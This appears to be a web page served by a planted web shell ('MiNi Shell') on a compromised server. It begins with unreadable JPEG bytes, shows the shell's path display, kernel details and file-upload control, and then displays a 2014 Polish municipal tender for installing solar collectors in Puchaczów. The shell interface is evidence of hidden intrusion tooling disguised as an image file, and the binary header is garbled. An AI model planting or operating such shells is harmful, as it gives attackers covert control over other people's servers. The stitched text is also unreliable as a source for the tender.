JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140613/200250-N-2014.html

<p class="kh_header"><b>Puchaczów: Odnawialne źródła czystej energii w gminie Puchaczów - montaż kolektorów słonecznych</b><br>
<b>Numer ogłoszenia: 200250 - 2014; data zamieszczenia: 13.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Puchaczów , ul. Lubelska 22, 21-013 Puchaczów, woj. lubelskie, tel. 081 7575780, faks 081 7575765.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.puchaczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odnawialne źródła czystej energii w gminie Puchaczów - montaż kolektorów słonecznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem umowy jest wykonanie uproszczonej dokumentacji projektowej oraz montaż 535 kompletów zestawów kolektorów słonecznych na terenie gminy Puchaczów w systemie zaprojektuj i wybuduj w ramach realizacji Projektu: Odnawialne źródła czystej energii w gminie Puchaczów - montaż kolektorów słonecznych współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013, Oś Projektowa VI: Środowisko i czysta energia Działanie 6.2. Energia przyjazna środowisku.
2. Przedmiot zamówienia w ramach zadania Odnawialne źródła czystej energii w gminie Puchaczów - montaż kolektorów słonecznych realizowany w systemie zaprojektuj i wybuduj obejmuje:
2.1. Wykonanie uproszczonej dokumentacji projektowej dla montażu 535 kompletów zestawów kolektorów słonecznych dla budynków wg wykazu stanowiącego załącznik  do programu funkcjonalno - użytkowego.
2.2. Zainstalowanie wg opracowanych projektów 535 kompletów zestawów kolektorów słonecznych dla przygotowania ciepłej wody użytkowej w budynkach mieszkalnych.
2.3. Próby, regulacja instalacji.
2.4. Rozruch technologiczny kolektorów słonecznych.
2.5. Przeszkolenie użytkowników co do zasad prawidłowej eksploatacji wykonanych kolektorów słonecznych wraz z opracowaniem szczegółowych instrukcji obsługi i ich przekazaniem użytkownikom.
2.6. Przeglądy gwarancyjne i przeglądy serwisowe w okresie gwarancyjnym z uzupełnianiem płynu solarnego. 
2.7. Zaprojektowanie i wykonanie specjalnego serwisu (portalu) internetowego, który będzie pełnił funkcje  edukacyjne, promocyjne oraz oferował usługi on-line zgodnie z zapisami programu  funkcjonalno - użytkowego oraz zapisami specyfikacji istotnych warunków zamówienia. 
3. Zestaw kolektorów słonecznych powinien zawierać:
- Kolektory słoneczne, 
- Uchwyty i konstrukcje wsporcze do zamocowania kolektorów słonecznych pod optymalnym kątem (dachy o małym nachyleniu),
- Podgrzewacz (zasobnik) ciepłej wody użytkowej,
- Zespół pompowo-sterowniczy,
- Zespół naczynia wzbiorczego przeponowego,
- Komplet orurowania wraz z armaturą przyłączeniową i izolacją cieplną,
- Nośnik ciepła (płyn solarny).
3.4. Zakres robót instalacyjnych i montażowych obejmuje:
- montaż kolektorów słonecznych,
- posadowienie zbiorników c.w.u.,
- podłączenie zbiorników c.w.u. do istniejącej instalacji c.w.u.,
- wykonanie instalacji łączących kolektory z zbiornikami i jej ocieplenie,
- montaż armatury (termometry, zawory bezpieczeństwa, zawory zwrotne, itp.),
- montaż zespołu pompowego z osprzętem,
- montaż zespołu naczynia przeponowego,
- instalacja układu sterującego, automatyki i wizualizacja pracy instalacji,
- wykonanie płukania oraz prób ciśnienia instalacji,
- napełnienie instalacji czynnikiem solarnym,
- uruchomienie instalacji,
- przeszkolenie użytkowników,
- sporządzenie instrukcji obsługi,
- uzupełnienie ubytków ścian, stropów, uszczelnienie pokrycia dachowego po przejściach przewodów- w zakresie i ilości uzgodnionym z właścicielem lub użytkownikiem obiektu,
- wykonanie przewodów instalacji wody zimnej, ciepłej, c.o. i elektrycznych w pomieszczeniu, w którym zostanie zamontowany zasobnik ciepłej wody. 

4. Przedmiot zamówienia szczegółowo opisany jest w Programie Funkcjonalno - Użytkowym stanowiącym integralną część niniejszej specyfikacji (załącznik nr 1 do siwz). Wszystkie nazwy producentów, użyte w siwz i w załączonych do siwz materiałach i załącznikach są przykładowe i mają na celu wyłącznie wskazanie standardu jakościowego przyjętych systemów. 

5. Wspólny słownik zamówień (CPV):
09331100-9 Kolektory słoneczne do produkcji ciepła
74232000-4	  Usługi inżynieryjne w zakresie projektowania
45351000-2	  Mechaniczne instalacje inżynieryjne
29875000-3	  Instalacje wodne
45453000-7	  Roboty remontowe i renowacyjne
45300000-0 Roboty instalacyjne w budynkach
45330000-9 Roboty instalacyjne wodno-kanalizacyjne i sanitarne

6. Zgodnie z art. 30 ust. 4 ustawy Prawo zamówień publicznych  Zamawiający w niniejszym postępowaniu dopuszcza zastosowanie przez wykonawców rozwiązań równoważnych w stosunku do rozwiązań opisanych w niniejszej specyfikacji istotnych warunków zamówienia zwanej dalej siwz. Wykonawca, który w ofercie powoła się na zastosowanie rozwiązań równoważnych opisywanym  w siwz, jest obowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez zamawiającego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości udzielenia zamówień uzupełniających zgodnie z  art. 67 ust. 1 pkt. 6 ustawy do 50 % wartości zamówienia podstawowego polegających na powtórzeniu tego samego rodzaju zamówień określonych  w specyfikacji istotnych warunków zamówienia i programie funkcjonalno - użytkowym. 
Zakres zamówień uzupełniających, będzie obejmował: 
- Wykonanie uproszczonej dokumentacji projektowej dla montażu kompletów zestawów kolektorów słonecznych dla budynków.
- Zainstalowanie wg opracowanych projektów kompletów zestawów kolektorów słonecznych dla przygotowania ciepłej wody  u. w budynkach mieszkalnych.
-  Próby, regulacja instalacji.
- Rozruch technologiczny kolektorów słonecznych.
- Przeszkolenie użytkowników co do zasad prawidłowej eksploatacji wykonanych kolektorów słonecznych wraz z opracowaniem szczegółowych instrukcji obsługi i ich przekazaniem użytkownikom.
- Przeglądy gwarancyjne i przeglądy serwisowe w okresie gwarancyjnym z uzupełnianiem płynu solarnego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.33.11.00-9, 74.23.20.00-4, 45.35.10.00-2, 29.87.50.00-3, 45.45.30.00-7, 45.30.00.00-0, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Składający ofertę winien wnieść wadium  przed upływem terminu składania ofert,  w wysokości 100.000,00 zł (słownie: sto tysięcy zł).
2. Wadium może być wnoszone w następujących formach:  
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2010  r. Nr 240, poz. 1603).
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem  na konto Zamawiającego:
Bank Spółdzielczy w Łęcznej nr konta 80869300060000017220060015
Tytułem -Wadium - Odnawialne źródła czystej energii w gminie Puchaczów - montaż kolektorów słonecznych
Za termin wniesienia wadium przyjmuje się datę uznania rachunku Zamawiającego. 
4. W przypadku wniesienia wadium w formie gwarancji lub poręczenia oryginał dokumentu należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego Urząd Gminy Puchaczów ul. Lubelska 22, 21-013 Puchaczów w sekretariacie pok. Nr 6.
5.	Wadium wniesione w formie gwarancji ubezpieczeniowej lub bankowej będzie akceptowane pod warunkiem, że jest zgodne z Prawem zamówień publicznych, a w szczególności:
1) gwarancja będzie zawierała wszystkie przypadki utraty wadium przez wykonawcę określone w art. 46 ust. 4a i ust. 5 Prawa zamówień publicznych
2) okres ważności gwarancji będzie nie krótszy niż okres związania ofertą określony w siwz.
6. Wadium wniesione w formie poręczenia bankowego, poręczenia spółdzielczej kasy oszczędnościowo - kredytowej lub poręczenia udzielonego przez podmiot, o którym mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości będzie akceptowane pod warunkiem, że jest zgodne z Prawem  zamówień publicznych, a w szczególności:
6.1. poręczenie będzie zawierało wszystkie przypadki utraty wadium przez wykonawcę określone w art. 46 ust. 4 a i ust. 5 Prawa zamówień publicznych.
6.2. poręczenie będzie zawierało określony datą termin odpowiedzialności nie krótszy niż okres związania ofertą określony w specyfikacji istotnych warunków zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy którzy w zakresie warunku  wykażą się wykonaniem minimum 1 roboty budowlanej w zakresie wykonania montażu zestawów kolektorów słonecznych, o wartości co najmniej 2.000.000,00 zł brutto, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>1. Wykaz winien wskazywać wykonanie minimum 1  roboty budowlanej, w zakresie montażu zestawów kolektorów słonecznych, o wartości co najmniej 2.000.000,00 zł brutto, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
2. Złożone poświadczenia winny potwierdzać należyte wykonanie oraz wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowe ukończenie robót budowlanych,  w zakresie  realizacji minimum 1 roboty budowlanej w zakresie wykonania montażu zestawów kolektorów słonecznych, o wartości co najmniej 2.000.000,00 zł, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie
.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi  odpowiadają wymaganiom określonym przez Zamawiającego należy przedłożyć do oferty:
1. Zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzające, że dostarczone produkty odpowiadają określonym normom lub specyfikacjom technicznym  tj.:
A)	Aktualne zaświadczenie / certyfikat zgodności wydany przez akredytowaną jednostkę certyfikującą potwierdzające zgodność oferowanego kolektora słonecznego z normami i parametrami podanymi w Programie funkcjonalno - użytkowy wraz ze sprawozdaniem z badań wydane przez niezależną akredytowaną jednostkę  badawczą
lub 
B) Aktualny europejski certyfikat na znak SOLAR KEYMARK nadany przez jednostkę certyfikującą potwierdzający zgodność oferowanego kolektora słonecznego z normami i parametrami w programie funkcjonalno - użytkowym wraz ze sprawozdaniem  z badań wydane przez niezależną akredytowaną jednostkę badawczą. 
2. Wykonawca może zamiast zaświadczeń, o których mowa w pkt. A złożyć równoważne zaświadczenie wystawione przez podmioty mające siedzibę w innym państwie członkowski Europejskiego Obszaru Gospodarczego lub inne dokumenty potwierdzające odpowiednio stosowanie przez wykonawcę równoważnych środków zapewnienia jakości.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (wg załącznika nr 5) - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 
2. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). 
3. Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba, której umocowanie do reprezentowania wykonawcy nie będzie wynikać z dokumentów załączonych do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony przewidują następujące rodzaje i warunki zmiany treści umowy:
1)	zmiana terminu realizacji przedmiotu umowy, w przypadku:
a) działania siły wyższej, uniemożliwiającego wykonanie robót w określonym pierwotnie terminie,
b) uwzględnienia wytycznych  i zaleceń instytucji, która przyznała środki na realizację umowy,
c) konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót,
d) konieczności wykonania dodatkowych badań i ekspertyz,
e)  zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie robót budowlanych zgodnie z przyjętą technologią lub spełnienie wymogów technologicznych, udokumentowanych w dzienniku budowy,
f) wystąpienie okoliczności, których nie dało się przewidzieć w chwili zawarcia umowy,
2) zmiana wynagrodzenia:
a) zmiana stawki i kwoty podatku VAT oraz wynagrodzenia brutto określonego w § 8 ust. 1 i 2,
b) zmniejszenie wynagrodzenia w przypadku rezygnacji z montażu zestawów kolektorów słonecznych przez właścicieli nieruchomości określonych w programie funkcjonalno - użytkowym, albo brakiem u nich możliwości montażowych, 
3) zmiana zakresu rzeczowego przedmiotu umowy w przypadku rezygnacji z montażu przez właścicieli nieruchomości określonych w programie funkcjonalno - użytkowym, albo brakiem możliwości montażu u nich kolektorów,
4) zmiana harmonogramu rzeczowo - finansowego,

2. Zmiany umowy przewidziane w ust. 1  dopuszczalne są na następujących warunkach:

ad pkt. 1) - zmiana terminu realizacji przedmiotu umowy nastąpi:
lit. a) o okres działania siły wyższej oraz potrzebny do usunięcia skutków tego działania,
lit. b) o okres umożliwiający uwzględnienie wytycznych i zaleceń,  
lit. c) o okres niezbędny do uzyskania wymaganych decyzji bądź uzgodnień,
lit. d) - o okres niezbędny do wykonania dodatkowych badań i ekspertyz,
lit. e) - o czas trwania niesprzyjających warunków atmosferycznych,
lit. f) - o okres niezbędny do uwzględnienia okoliczności, których nie udało się przewidzieć,

ad pkt. 2) zmiana wynagrodzenia nastąpi:
lit.a) stawka i kwota podatku VAT oraz wynagrodzenie brutto, ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę,
lit.b) zmniejszenie wynagrodzenia proporcjonalnie do zmniejszonego zakresu przedmiotu umowy.

ad pkt. 3) zmiana zakresu rzeczowego w przypadku rezygnacji właścicieli albo braku możliwości montażu w ich miejsce zostaną dołączone inne nieruchomości z terenu gminy Puchaczów tożsame co do kompletu zestawu kolektorów słonecznych znajdujących się na liście rezerwowej, lub zostanie odpowiednio zmniejszony zakres przedmiotu umowy i wynagrodzenie brutto.

ad pkt 4) zmniejszenie zakresu rzeczowego lub zmniejszenie wynagrodzenia oraz zmiany terminu realizacji przedmiotu umowy w przypadkach określonych w pkt. 1 i pkt. 2.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.puchaczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Puchaczów ul. Lubelska 22, 21-013 Puchaczów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2014 godzina 10:00, miejsce: Urząd Gminy Puchaczów ul. Lubelska 22, 21-013 Puchaczów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach projektu pn.: Odnawialne źródła czystej energii w gminie Puchaczów - montaż kolektorów słonecznych współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013, Oś Projektowa VI: Środowisko i czysta energia Działanie 6.2. Energia przyjazna środowisku..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com